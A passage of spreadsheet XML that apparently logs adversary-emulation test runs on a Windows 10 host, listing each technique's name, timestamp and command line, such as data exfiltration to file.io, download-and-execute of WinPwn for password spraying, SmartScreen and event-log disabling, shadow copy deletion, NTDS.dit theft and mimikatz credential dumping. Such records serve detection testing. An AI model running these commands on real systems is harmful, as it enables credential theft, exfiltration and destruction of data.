          <cell r="G115" t="str">
            <v>reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeDC /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffsetDC /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTime /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v GroupPolicyRefreshTimeOffset /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v EnableSmartScreen /t REG_DWORD /d 0 /f &amp;&amp; reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v ShellSmartScreenLevel /t REG_SZ /d Block /f</v>
          </cell>
        </row>
        <row r="116">
          <cell r="A116" t="str">
            <v>Testing usage of uncommonly used port with PowerShell</v>
          </cell>
          <cell r="B116" t="str">
            <v>2022-11-30T19:23:38Z</v>
          </cell>
          <cell r="C116" t="str">
            <v>Testing usage of uncommonly used port with PowerShell</v>
          </cell>
          <cell r="D116" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E116" t="str">
            <v>win10</v>
          </cell>
          <cell r="F116">
            <v>712</v>
          </cell>
          <cell r="G116" t="str">
            <v>Test-NetConnection -ComputerName google.com -port 8081</v>
          </cell>
        </row>
        <row r="117">
          <cell r="A117" t="str">
            <v>IcedID Botnet HTTP PUT</v>
          </cell>
          <cell r="B117" t="str">
            <v>2022-11-30T19:24:49Z</v>
          </cell>
          <cell r="C117" t="str">
            <v>IcedID Botnet HTTP PUT</v>
          </cell>
          <cell r="D117" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E117" t="str">
            <v>win10</v>
          </cell>
          <cell r="F117">
            <v>8072</v>
          </cell>
          <cell r="G117" t="str">
            <v>$fileName = "C:\temp\T1020_exfilFile.txt"; $url = "https://google.com"; $file = New-Item -Force $fileName -Value "This is ART IcedID Botnet Exfil Test"; $contentType = "application/octet-stream"; try {Invoke-WebRequest -Uri $url -Method Put -ContentType $contentType -InFile $fileName} catch{}</v>
          </cell>
        </row>
        <row r="118">
          <cell r="A118" t="str">
            <v>Exfiltrate data HTTPS using curl windows</v>
          </cell>
          <cell r="B118" t="str">
            <v>2022-11-30T19:25:29Z</v>
          </cell>
          <cell r="C118" t="str">
            <v>Exfiltrate data HTTPS using curl windows</v>
          </cell>
          <cell r="D118" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E118" t="str">
            <v>win10</v>
          </cell>
          <cell r="F118">
            <v>6356</v>
          </cell>
          <cell r="G118" t="str">
            <v>C:\Windows\System32\Curl.exe -F 'file=@3945c9_artifact' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/</v>
          </cell>
        </row>
        <row r="119">
          <cell r="A119" t="str">
            <v>Windows - Overwrite file with Sysinternals SDelete</v>
          </cell>
          <cell r="B119" t="str">
            <v>2022-11-30T19:26:24Z</v>
          </cell>
          <cell r="C119" t="str">
            <v>Windows - Overwrite file with Sysinternals SDelete</v>
          </cell>
          <cell r="D119" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E119" t="str">
            <v>win10</v>
          </cell>
          <cell r="F119">
            <v>4712</v>
          </cell>
          <cell r="G119" t="str">
            <v>if (-not (Test-Path $env:TEMP\T1485.txt)) { New-Item $env:TEMP\T1485.txt -Force }; Invoke-Expression -Command "$env:TEMP\Sdelete\sdelete.exe -accepteula $env:TEMP\T1485.txt"</v>
          </cell>
        </row>
        <row r="120">
          <cell r="A120" t="str">
            <v>Potentially Unwanted Applications (PUA)</v>
          </cell>
          <cell r="B120" t="str">
            <v>2022-11-30T19:27:24Z</v>
          </cell>
          <cell r="C120" t="str">
            <v>Potentially Unwanted Applications (PUA)</v>
          </cell>
          <cell r="D120" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E120" t="str">
            <v>win10</v>
          </cell>
          <cell r="F120">
            <v>3424</v>
          </cell>
          <cell r="G120" t="str">
            <v>Invoke-WebRequest http://amtso.eicar.org/PotentiallyUnwanted.exe -OutFile $env:TEMP/PotentiallyUnwanted.exe; &amp; "$env:TEMP/PotentiallyUnwanted.exe"</v>
          </cell>
        </row>
        <row r="121">
          <cell r="A121" t="str">
            <v>Excel 4 Macro</v>
          </cell>
          <cell r="B121" t="str">
            <v>2022-11-30T19:29:04Z</v>
          </cell>
          <cell r="C121" t="str">
            <v>Excel 4 Macro</v>
          </cell>
          <cell r="D121" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E121" t="str">
            <v>win10</v>
          </cell>
          <cell r="F121">
            <v>5028</v>
          </cell>
          <cell r="G121" t="str">
            <v>$fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"; $fname1 = "$env:TEMP\procexp.exe"; if (Test-Path $fname) {;   Remove-Item $fname;   Remove-Item $fname1; }; $xlApp = New-Object -COMObject "Excel.Application"; $xlApp.Visible = $True; $xlApp.DisplayAlerts = $False; $xlBook = $xlApp.Workbooks.Add(); $sheet = $xlBook.Excel4MacroSheets.Add(); if ("$env:Username" -ne "") {;   $sheet.Cells.Item(1</v>
          </cell>
        </row>
        <row r="122">
          <cell r="A122" t="str">
            <v>Download Macro-Enabled Phishing Attachment</v>
          </cell>
          <cell r="B122" t="str">
            <v>2022-11-30T19:29:59Z</v>
          </cell>
          <cell r="C122" t="str">
            <v>Download Macro-Enabled Phishing Attachment</v>
          </cell>
          <cell r="D122" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E122" t="str">
            <v>win10</v>
          </cell>
          <cell r="F122">
            <v>7124</v>
          </cell>
          <cell r="G122" t="str">
            <v>$url = 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1566.001/bin/PhishingAttachment.xlsm'; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri $url -OutFile $env:TEMP\PhishingAttachment.xlsm</v>
          </cell>
        </row>
        <row r="123">
          <cell r="A123" t="str">
            <v>Disable Event Logging with wevtutil</v>
          </cell>
          <cell r="B123" t="str">
            <v>2022-11-30T19:30:40Z</v>
          </cell>
          <cell r="C123" t="str">
            <v>Disable Event Logging with wevtutil</v>
          </cell>
          <cell r="D123" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E123" t="str">
            <v>win10</v>
          </cell>
          <cell r="F123">
            <v>7076</v>
          </cell>
          <cell r="G123" t="str">
            <v>wevtutil sl "Microsoft-Windows-IKE/Operational" /e:false</v>
          </cell>
        </row>
        <row r="124">
          <cell r="A124" t="str">
            <v>Edit an existing time provider</v>
          </cell>
          <cell r="B124" t="str">
            <v>2022-11-30T19:31:25Z</v>
          </cell>
          <cell r="C124" t="str">
            <v>Edit an existing time provider</v>
          </cell>
          <cell r="D124" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E124" t="str">
            <v>win10</v>
          </cell>
          <cell r="F124">
            <v>6976</v>
          </cell>
          <cell r="G124" t="str">
            <v>net stop w32time; Copy-Item d97818_AtomicTest.dll C:\Users\Public\AtomicTest.dll; reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_SZ /v "DllName" /d "C:\Users\Public\AtomicTest.dll" /f; reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "Enabled" /d "1" /f; reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer" /t REG_DWORD /v "InputProvider" /d "1" /f; net start w32time</v>
          </cell>
        </row>
        <row r="125">
          <cell r="A125" t="str">
            <v>Hide Windows Clock Group Policy Feature</v>
          </cell>
          <cell r="B125" t="str">
            <v>2022-11-30T19:32:25Z</v>
          </cell>
          <cell r="C125" t="str">
            <v>Hide Windows Clock Group Policy Feature</v>
          </cell>
          <cell r="D125" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E125" t="str">
            <v>win10</v>
          </cell>
          <cell r="F125">
            <v>7336</v>
          </cell>
          <cell r="G125" t="str">
            <v>reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideClock /t REG_DWORD /d 1 /f</v>
          </cell>
        </row>
        <row r="126">
          <cell r="A126" t="str">
            <v>attrib - Remove read-only attribute</v>
          </cell>
          <cell r="B126" t="str">
            <v>2022-11-30T19:33:05Z</v>
          </cell>
          <cell r="C126" t="str">
            <v>attrib - Remove read-only attribute</v>
          </cell>
          <cell r="D126" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E126" t="str">
            <v>win10</v>
          </cell>
          <cell r="F126">
            <v>1652</v>
          </cell>
          <cell r="G126" t="str">
            <v>mkdir %temp%\T1222.001_attrib;echo T1222.001_attrib1 &gt;&gt; %temp%\T1222.001_attrib\T1222.001_attrib1.txt;echo T1222.001_attrib2 &gt;&gt; %temp%\T1222.001_attrib\T1222.001_attrib2.txt;attrib.exe +r %temp%\T1222.001_attrib\T1222.001_attrib1.txt;attrib.exe +r %temp%\T1222.001_attrib\T1222.001_attrib2.txt;attrib.exe -r %temp%\T1222.001_attrib\*.* /s</v>
          </cell>
        </row>
        <row r="127">
          <cell r="A127" t="str">
            <v>attrib - hide file</v>
          </cell>
          <cell r="B127" t="str">
            <v>2022-11-30T19:33:45Z</v>
          </cell>
          <cell r="C127" t="str">
            <v>attrib - hide file</v>
          </cell>
          <cell r="D127" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E127" t="str">
            <v>win10</v>
          </cell>
          <cell r="F127">
            <v>3516</v>
          </cell>
          <cell r="G127" t="str">
            <v>mkdir %temp%\T1222.001_attrib_2 &gt;nul 2&gt;&amp;1 &amp;&amp; echo T1222.001_attrib1 &gt;&gt; %temp%\T1222.001_attrib_2\T1222.001_attrib1.txt &amp;&amp; echo T1222.001_attrib2 &gt;&gt; %temp%\T1222.001_attrib_2\T1222.001_attrib2.txt &amp;&amp; attrib.exe +h %temp%\T1222.001_attrib_2\T1222.001_attrib1.txt &amp;&amp; attrib.exe +h %temp%\T1222.001_attrib_2\T1222.001_attrib2.txt</v>
          </cell>
        </row>
        <row r="128">
          <cell r="A128" t="str">
            <v>WinPwn - DomainPasswordSpray Attacks</v>
          </cell>
          <cell r="B128" t="str">
            <v>2022-11-30T19:34:50Z</v>
          </cell>
          <cell r="C128" t="str">
            <v>WinPwn - DomainPasswordSpray Attacks</v>
          </cell>
          <cell r="D128" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E128" t="str">
            <v>win10</v>
          </cell>
          <cell r="F128">
            <v>8068</v>
          </cell>
          <cell r="G128" t="str">
            <v>$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'; iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1'); domainpassspray -consoleoutput -noninteractive -emptypasswords</v>
          </cell>
        </row>
        <row r="129">
          <cell r="A129" t="str">
            <v>C2 Data Exfiltration</v>
          </cell>
          <cell r="B129" t="str">
            <v>2022-11-30T19:35:46Z</v>
          </cell>
          <cell r="C129" t="str">
            <v>C2 Data Exfiltration</v>
          </cell>
          <cell r="D129" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E129" t="str">
            <v>win10</v>
          </cell>
          <cell r="F129">
            <v>7544</v>
          </cell>
          <cell r="G129" t="str">
            <v>if(-not (Test-Path $env:TEMP\LineNumbers.txt)){ ;   1..100 | ForEach-Object { Add-Content -Path $env:TEMP\LineNumbers.txt -Value "This is line $_." }; }; [System.Net.ServicePointManager]::Expect100Continue = $false; $filecontent = Get-Content -Path $env:TEMP\LineNumbers.txt; Invoke-WebRequest -Uri example.com -Method POST -Body $filecontent -DisableKeepAlive</v>
          </cell>
        </row>
        <row r="130">
          <cell r="A130" t="str">
            <v>Leave note</v>
          </cell>
          <cell r="B130" t="str">
            <v>2022-11-30T19:36:31Z</v>
          </cell>
          <cell r="C130" t="str">
            <v>Leave note</v>
          </cell>
          <cell r="D130" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E130" t="str">
            <v>win10</v>
          </cell>
          <cell r="F130">
            <v>3372</v>
          </cell>
          <cell r="G130" t="str">
            <v>Set-Content -Path 'message.txt' -Value 'proof that this machine was hacked.'</v>
          </cell>
        </row>
        <row r="131">
          <cell r="A131" t="str">
            <v>Windows - Delete Volume Shadow Copies via WMI</v>
          </cell>
          <cell r="B131" t="str">
            <v>2022-11-30T19:37:31Z</v>
          </cell>
          <cell r="C131" t="str">
            <v>Windows - Delete Volume Shadow Copies via WMI</v>
          </cell>
          <cell r="D131" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E131" t="str">
            <v>win10</v>
          </cell>
          <cell r="F131">
            <v>4964</v>
          </cell>
          <cell r="G131" t="str">
            <v>wmic.exe shadowcopy delete</v>
          </cell>
        </row>
      </sheetData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CB10C-ED56-4D3D-90D6-12A4A3702ACF}">
  <dimension ref="A1:C144"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="A82" sqref="A82:C82"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr baseColWidth="10" defaultRowHeight="14.5" x14ac:dyDescent="0.35"/>
  <cols>
    <col min="2" max="2" width="99.54296875" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="255.6328125" bestFit="1" customWidth="1"/>
  </cols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 t="s">
        <v>3</v>
      </c>
      <c r="B2" t="s">
        <v>4</v>
      </c>
      <c r="C2" t="str">
        <f>VLOOKUP(B2,[1]Discovery!A:G,7,FALSE)</f>
        <v>12011c_AdFind.exe -sc admincountdmp</v>
      </c>
    </row>
    <row r="3" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A3" t="s">
        <v>5</v>
      </c>
      <c r="B3" t="s">
        <v>6</v>
      </c>
      <c r="C3" t="str">
        <f>VLOOKUP(B3,[1]Discovery!A:G,7,FALSE)</f>
        <v>12011c_AdFind.exe -gcb -sc trustdmp</v>
      </c>
    </row>
    <row r="4" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A4" t="s">
        <v>3</v>
      </c>
      <c r="B4" t="s">
        <v>7</v>
      </c>
      <c r="C4" t="str">
        <f>VLOOKUP(B4,[1]Discovery!A:G,7,FALSE)</f>
        <v>12011c_AdFind.exe -sc exchaddresses</v>
      </c>
    </row>
    <row r="5" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A5" t="s">
        <v>8</v>
      </c>
      <c r="B5" t="s">
        <v>9</v>
      </c>
      <c r="C5" t="str">
        <f>VLOOKUP(B5,[1]Discovery!A:G,7,FALSE)</f>
        <v>12011c_AdFind.exe -sc dclist</v>
      </c>
    </row>
    <row r="6" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A6" t="s">
        <v>10</v>
      </c>
      <c r="B6" t="s">
        <v>11</v>
      </c>
      <c r="C6" t="str">
        <f>VLOOKUP(B6,[1]Discovery!A:G,7,FALSE)</f>
        <v>Get-AdGroup -Filter *</v>
      </c>
    </row>
    <row r="7" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A7" t="s">
        <v>3</v>
      </c>
      <c r="B7" t="s">
        <v>12</v>
      </c>
      <c r="C7" t="str">
        <f>VLOOKUP(B7,[1]Discovery!A:G,7,FALSE)</f>
        <v>12011c_AdFind.exe -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties</v>
      </c>
    </row>
    <row r="8" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A8" t="s">
        <v>8</v>
      </c>
      <c r="B8" t="s">
        <v>13</v>
      </c>
      <c r="C8" t="str">
        <f>VLOOKUP(B8,[1]Discovery!A:G,7,FALSE)</f>
        <v>Import-Module .\powerview.ps1;Get-DomainComputer</v>
      </c>
    </row>
    <row r="9" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A9" t="s">
        <v>10</v>
      </c>
      <c r="B9" t="s">
        <v>14</v>
      </c>
      <c r="C9" t="str">
        <f>VLOOKUP(B9,[1]Discovery!A:G,7,FALSE)</f>
        <v>Import-Module .\powerview.ps1;Get-NetLocalGroupMember -ComputerName exchange.windomain.local</v>
      </c>
    </row>
    <row r="10" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A10" t="s">
        <v>8</v>
      </c>
      <c r="B10" t="s">
        <v>15</v>
      </c>
      <c r="C10" t="str">
        <f>VLOOKUP(B10,[1]Discovery!A:G,7,FALSE)</f>
        <v>Get-AdComputer -Filter *</v>
      </c>
    </row>
    <row r="11" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A11" t="s">
        <v>8</v>
      </c>
      <c r="B11" t="s">
        <v>16</v>
      </c>
      <c r="C11" t="str">
        <f>VLOOKUP(B11,[1]Discovery!A:G,7,FALSE)</f>
        <v>get-wmiobject -class ds_computer -namespace root\directory\ldap</v>
      </c>
    </row>
    <row r="12" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A12" t="s">
        <v>17</v>
      </c>
      <c r="B12" t="s">
        <v>18</v>
      </c>
      <c r="C12" t="str">
        <f>VLOOKUP(B12,[1]Discovery!A:G,7,FALSE)</f>
        <v>get-addefaultdomainpasswordpolicy</v>
      </c>
    </row>
    <row r="13" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A13" t="s">
        <v>3</v>
      </c>
      <c r="B13" t="s">
        <v>19</v>
      </c>
      <c r="C13" t="str">
        <f>VLOOKUP(B13,[1]Discovery!A:G,7,FALSE)</f>
        <v>(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0</v>
      </c>
    </row>
    <row r="14" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A14" t="s">
        <v>20</v>
      </c>
      <c r="B14" t="s">
        <v>21</v>
      </c>
      <c r="C14" t="str">
        <f>VLOOKUP(B14,[1]Discovery!A:G,7,FALSE)</f>
        <v>if ("NTLM".ToLower() -NotIn @("ntlm"</v>
      </c>
    </row>
    <row r="15" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A15" t="s">
        <v>22</v>
      </c>
      <c r="B15" t="s">
        <v>23</v>
      </c>
      <c r="C15" t="str">
        <f>VLOOKUP(B15,[1]Discovery!A:G,7,FALSE)</f>
        <v>if not exist C:\Windows\Temp  ( call ) ELSE ( mkdir C:\Windows\Temp ) &amp;&amp;   &amp;&amp;  copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\Temp\ntds.dit &amp;&amp; copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\VSC_SYSTEM_HIVE &amp;&amp; reg save HKLM\SYSTEM C:\Windows\Temp\SYSTEM_HIVE</v>
      </c>
    </row>
    <row r="16" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A16" t="s">
        <v>22</v>
      </c>
      <c r="B16" t="s">
        <v>24</v>
      </c>
      <c r="C16" t="str">
        <f>VLOOKUP(B16,[1]Discovery!A:G,7,FALSE)</f>
        <v>vssadmin.exe create shadow /for=C: &amp;&amp; mklink /D C:\Temp\vssstore \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1</v>
      </c>
    </row>
    <row r="17" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A17" t="s">
        <v>22</v>
      </c>
      <c r="B17" t="s">
        <v>25</v>
      </c>
      <c r="C17" t="str">
        <f>VLOOKUP(B17,[1]Discovery!A:G,7,FALSE)</f>
        <v>wmic shadowcopy call create Volume=C:\</v>
      </c>
    </row>
    <row r="18" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A18" t="s">
        <v>22</v>
      </c>
      <c r="B18" t="s">
        <v>26</v>
      </c>
      <c r="C18" t="str">
        <f>VLOOKUP(B18,[1]Discovery!A:G,7,FALSE)</f>
        <v>(gwmi -list win32_shadowcopy).Create('C:\'</v>
      </c>
    </row>
    <row r="19" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A19" t="s">
        <v>27</v>
      </c>
      <c r="B19" t="s">
        <v>28</v>
      </c>
      <c r="C19" t="str">
        <f>VLOOKUP(B19,[1]Discovery!A:G,7,FALSE)</f>
        <v>Remove-Item $env:TEMP\golden.bat -ErrorAction Ignore; Remove-Item $env:TEMP\golden.txt -ErrorAction Ignore; $domain_sid = "S-1-5-21-DEFAULT"; If ($domain_sid -Match "DEFAULT") {;   $domain = gwmi Win32_ComputerSystem | Select -Expand Domain;   $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value;   $domain_sid = $krbtgtSID.SubString(0</v>
      </c>
    </row>
    <row r="20" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A20" t="s">
        <v>29</v>
      </c>
      <c r="B20" t="s">
        <v>30</v>
      </c>
      <c r="C20" t="str">
        <f>VLOOKUP(B20,[1]Discovery!A:G,7,FALSE)</f>
        <v>C:\PSTools\PsExec.exe /accepteula \\DC1 -c %tmp%\mimikatz\x64\mimikatz.exe "lsadump::lsa /inject /id:500" "exit"</v>
      </c>
    </row>
    <row r="21" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A21" t="s">
        <v>32</v>
      </c>
      <c r="B21" t="s">
        <v>33</v>
      </c>
      <c r="C21" t="str">
        <f>VLOOKUP(B21,[1]Discovery!A:G,7,FALSE)</f>
        <v>[environment]::OSVersion.Version</v>
      </c>
    </row>
    <row r="22" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A22" t="s">
        <v>32</v>
      </c>
      <c r="B22" t="s">
        <v>34</v>
      </c>
      <c r="C22" t="str">
        <f>VLOOKUP(B22,[1]Discovery!A:G,7,FALSE)</f>
        <v>hostname</v>
      </c>
    </row>
    <row r="23" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A23" t="s">
        <v>32</v>
      </c>
      <c r="B23" t="s">
        <v>31</v>
      </c>
      <c r="C23" t="str">
        <f>VLOOKUP(B23,[1]Discovery!A:G,7,FALSE)</f>
        <v>systeminfo &amp;&amp; reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum</v>
      </c>
    </row>
    <row r="24" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A24" t="s">
        <v>8</v>
      </c>
      <c r="B24" t="s">
        <v>35</v>
      </c>
      <c r="C24" t="str">
        <f>VLOOKUP(B24,[1]Discovery!A:G,7,FALSE)</f>
        <v>arp -a</v>
      </c>
    </row>
    <row r="25" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A25" t="s">
        <v>8</v>
      </c>
      <c r="B25" t="s">
        <v>36</v>
      </c>
      <c r="C25" t="str">
        <f>VLOOKUP(B25,[1]Discovery!A:G,7,FALSE)</f>
        <v>$localip = ((ipconfig | findstr [0-9].\.)[0]).Split()[-1]; $pieces = $localip.split("."); $firstOctet = $pieces[0]; $secondOctet = $pieces[1]; $thirdOctet = $pieces[2]; foreach ($ip in 1..255 | % { "$firstOctet.$secondOctet.$thirdOctet.$_" } ) {cmd.exe /c nslookup $ip}</v>
      </c>
    </row>
    <row r="26" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A26" t="s">
        <v>8</v>
      </c>
      <c r="B26" t="s">
        <v>37</v>
      </c>
      <c r="C26" t="str">
        <f>VLOOKUP(B26,[1]Discovery!A:G,7,FALSE)</f>
        <v>net group "Domain Computers" /domain</v>
      </c>
    </row>
    <row r="27" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A27" t="s">
        <v>39</v>
      </c>
      <c r="B27" t="s">
        <v>40</v>
      </c>
      <c r="C27" t="str">
        <f>VLOOKUP(B27,[1]Discovery!A:G,7,FALSE)</f>
        <v>Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe https://nmap.org/dist/nmap-7.80-setup.exe;Start-Process $env:temp\nmap-7.80-setup.exe /S;nmap 127.0.0.1</v>
      </c>
    </row>
    <row r="28" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A28" t="s">
        <v>39</v>
      </c>
      <c r="B28" t="s">
        <v>38</v>
      </c>
      <c r="C28" t="str">
        <f>VLOOKUP(B28,[1]Discovery!A:G,7,FALSE)</f>
        <v>Import-Module ./basic_scanner.ps1;$ports = @(22</v>
      </c>
    </row>
    <row r="29" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A29" t="s">
        <v>42</v>
      </c>
      <c r="B29" t="s">
        <v>41</v>
      </c>
      <c r="C29" t="str">
        <f>VLOOKUP(B29,[1]Discovery!A:G,7,FALSE)</f>
        <v>cmd.exe /C whoami &amp;&amp; wmic useraccount get /ALL &amp;&amp; quser /SERVER:"localhost" &amp;&amp; quser &amp;&amp; qwinsta.exe /server:localhost &amp;&amp; qwinsta.exe &amp;&amp; for /F "tokens=1</v>
      </c>
    </row>
    <row r="30" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A30" t="s">
        <v>44</v>
      </c>
      <c r="B30" t="s">
        <v>45</v>
      </c>
      <c r="C30" t="str">
        <f>VLOOKUP(B30,[1]Discovery!A:G,7,FALSE)</f>
        <v>netstat -anto;Get-NetTCPConnection</v>
      </c>
    </row>
    <row r="31" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A31" t="s">
        <v>44</v>
      </c>
      <c r="B31" t="s">
        <v>43</v>
      </c>
      <c r="C31" t="str">
        <f>VLOOKUP(B31,[1]Discovery!A:G,7,FALSE)</f>
        <v>netstat &amp;&amp; net use &amp;&amp; net sessions</v>
      </c>
    </row>
    <row r="32" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A32" t="s">
        <v>47</v>
      </c>
      <c r="B32" t="s">
        <v>46</v>
      </c>
      <c r="C32" t="str">
        <f>VLOOKUP(B32,[1]Discovery!A:G,7,FALSE)</f>
        <v>reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce &amp;&amp; reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices &amp;&amp; reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices &amp;&amp; reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify" &amp;&amp; reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit" &amp;&amp; reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" &amp;&amp; reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell" &amp;&amp; reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run &amp;&amp; reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run &amp;&amp; reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run &amp;&amp; reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run &amp;&amp; reg query HKLM\system\currentcontrolset\services /s | findstr ImagePath 2&gt;nul | findstr /Ri ".*\.sys$" &amp;&amp; reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run</v>
      </c>
    </row>
    <row r="33" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A33" t="s">
        <v>48</v>
      </c>
      <c r="B33" t="s">
        <v>49</v>
      </c>
      <c r="C33" t="str">
        <f>VLOOKUP(B33,[1]Discovery!A:G,7,FALSE)</f>
        <v>netsh advfirewall firewall show rule name=all</v>
      </c>
    </row>
    <row r="34" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A34" t="s">
        <v>48</v>
      </c>
      <c r="B34" t="s">
        <v>50</v>
      </c>
      <c r="C34" t="str">
        <f>VLOOKUP(B34,[1]Discovery!A:G,7,FALSE)</f>
        <v>ipconfig</v>
      </c>
    </row>
    <row r="35" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A35" t="s">
        <v>51</v>
      </c>
      <c r="B35" t="s">
        <v>52</v>
      </c>
      <c r="C35" t="str">
        <f>VLOOKUP(B35,[1]Discovery!A:G,7,FALSE)</f>
        <v>get-wmiObject -class Win32_Process</v>
      </c>
    </row>
    <row r="36" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A36" t="s">
        <v>51</v>
      </c>
      <c r="B36" t="s">
        <v>53</v>
      </c>
      <c r="C36" t="str">
        <f>VLOOKUP(B36,[1]Discovery!A:G,7,FALSE)</f>
        <v>get-process &gt;&gt; $env:APPDATA\vmtools.log;cat $env:APPDATA\vmtools.log</v>
      </c>
    </row>
    <row r="37" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A37" t="s">
        <v>51</v>
      </c>
      <c r="B37" t="s">
        <v>54</v>
      </c>
      <c r="C37" t="str">
        <f>VLOOKUP(B37,[1]Discovery!A:G,7,FALSE)</f>
        <v>tasklist</v>
      </c>
    </row>
    <row r="38" spans="1:3" x14ac:dyDescent="0.35">
      <c r="A38" t="s">
